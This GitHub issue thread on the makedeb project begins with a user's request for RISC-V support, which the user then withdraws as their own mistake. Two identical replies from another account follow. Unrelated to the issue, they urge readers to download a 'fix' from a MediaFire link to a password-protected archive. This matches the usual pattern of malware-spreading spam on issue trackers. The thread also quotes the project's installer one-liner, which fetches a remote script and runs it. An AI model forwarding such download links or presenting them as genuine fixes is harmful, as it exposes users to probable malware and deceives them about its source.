### ISSUE TITLE
RISC-V Support

### ISSUE THREAD

**Issue by archanox** [makedeb/makedeb.org#40]
I just tried installing makedeb via the install script (`bash -ci "$(wget -qO - 'https://shlink.makedeb.org/install')" `). Unfortunately I was presented with the following error.

Would it be possible to add RISC-V as a supported architecture?

**Comment by archanox** [comment]
Sorry, user error. 😅

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
